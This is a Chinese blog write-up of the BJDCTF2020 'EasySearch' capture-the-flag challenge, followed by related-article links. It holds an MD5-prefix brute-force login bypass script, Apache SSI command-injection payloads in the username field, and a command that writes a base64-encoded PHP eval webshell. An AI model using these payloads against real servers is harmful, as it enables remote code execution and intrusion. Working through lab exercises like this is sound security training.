[BJDCTF2020]EasySearch 1

最新推荐文章于 2024-02-17 12:51:12 发布
最新推荐文章于 2024-02-17 12:51:12 发布
阅读量587 收藏 3
点赞数
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/124955084
版权

[BJDCTF2020]EasySearch 1

首先打开得到登陆框:

用
尝试弱口令,发现没有用

于是就扫描目录发现
有源码泄露:

在这里插入图片描述

/index.php.swp

在这里插入图片描述
代码解读:

在这里插入图片描述

发现当username不为空,并且admin等于6d0bc1和password的md5值的前六位的值相同就登陆

白嫖大佬的md5脚本:

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

得到可以绕过的字符:

在这里插入图片描述

随便选一个登陆:

在这里插入图片描述
登陆后发现在消息头有一个地址

访问得到:

在这里插入图片描述
发现回显用户名:6d0bc1

而且还是sthml页面,测试是否存在shtml的Apache SSI 远程命令执行漏洞

可以参考:
https://cloud.tencent.com/developer/article/1540513

然后利用shtml的命令执行:

可控参数是username

username=<!--#exec cmd="ls"-->&password=9162671

在这里插入图片描述
访问:

在这里插入图片描述

发现命令执行成功回显内容

利用这个写入php一句话木马:

在这里插入图片描述

username=<!--#exec cmd="echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d> shell.php"-->&password=9162671

访问页面执行命令
在这里插入图片描述
访问木马

在这里插入图片描述
读取flag:

在这里插入图片描述
在这里插入图片描述
参考博客:
https://blog.csdn.net/weixin_45577185/article/details/120805353

南冥~
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 2926
buuctf 源码泄露 ssi远程命令执行漏洞
易搜 (EasySearch)-crx插件
03-19
易搜 (EasySearch) 对你选中的关键字提供快捷搜索功能。 易搜 (EasySearch) 对你选中的关键字提供快捷搜索功能。后续版本可以使用自定义搜索功能。 更新日志: 1.01 -增加英文语言支持; -增加自定义搜索功能; -优化核心代码; 1.00 -发布。 支持语言:English,中文 (简体),中文 (繁體)
[BJDCTF2020]EasySearch1 不会编程的崽
最新发布
不会编程的崽的博客
02-17 612
dirmap后台文件扫描,shtml ssl注入
BUUCTF-WEBBJDCTF2020EasySearch 1
qq_36410265的博客
02-08 285
SSI(服务端包含)
使用 Easysearch,日志存储少一半
infinilabs的博客
05-16 93
在海量日志存储场景中,索引膨胀率是一个关键指标,直接影响存储成本和查询性能。它表示原始数据与索引数据在磁盘上所占空间的比率。较高的索引膨胀率不仅增加了存储成本,而且可能会影响查询速度,尤其是在 I/O 密集型的查询中。因此,我们需要密切关注和优化索引膨胀率。接下来,我们将比较 ElasticsearchEasysearch 在处理相同数据时的索引膨胀率。
BUUCTF [BJDCTF2020]EasySearch 1
qq_56313338的博客
09-25 163
.swp” 后缀通常用于表示 Vim(一种文本编辑器)的交换文件。Vim 是一个强大的文本编辑器,它在编辑文件时会创建交换文件以确保文件内容的安全性。
[BJDCTF2020]EasySearch
zzqzzq11的博客
12-05 812
首先,介绍下SHTML,在SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含的SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。
BUUCTF [BJDCTF2020] EasySearch
Senimo
01-06 678
BUUCTF [BJDCTF2020] EasySearch 考点: Apache SSI 远程命令执行 shtml文件 启动环境: 一个登录框,尝试了弱密码与万能密码,均无结果,继续对题目进行信息收集,使用ctf-wscan扫描目录: python3 ctf-wscan.py http://c4567f9c-24a4-42fd-a60f-1e02b2aa1f07.node3.buuoj.cn/ 得到扫描结果,其存在index.php.swp文件: <?php ob_start(); f
SSI漏洞之[BJDCTF2020]EasySearch1
qq_58970968的博客
08-17 182
知识点:,在SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含的SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。
拿走不谢!4100套iOS源码,40G!
ChatGPTer
11-10 1741
此时,只需要一张图就可以表达。
EasySearch
03-16
Make the search easyly HOW TO INSTALL ============== Please copy the easysearch.jar to your JBuilder lib/ext folder, and re-start JBuilder. HOW TO UNINSTALL ================ Exit from JBuilder, and remove easysearch.jar from your JBuilder lib/ext folder. HOW TO USE ========== 1. Select some text in JBuilder Editor pane or copy some text into clipboard. 2. Click the Search button in toolbar, it will search the next text from the cursor position. 3. Click the Highlight button in toolbar, it will highlight all the matched text in editor pane. 4. Ctrl-Up Search the previous text. 5 Ctrl-Down Search the next text.
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
justCTF-2020:justCTF 2020
05-24
justCTF-2020 justCTF 2020 和彩云分流: 链接: 提取码:GqUZ
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
[BJDCTF2020]EasySearch(ssi漏洞)
Yang_99的博客
09-26 369
1.首页御剑扫描可以发现有index.php.swp,可以查看源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。...在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值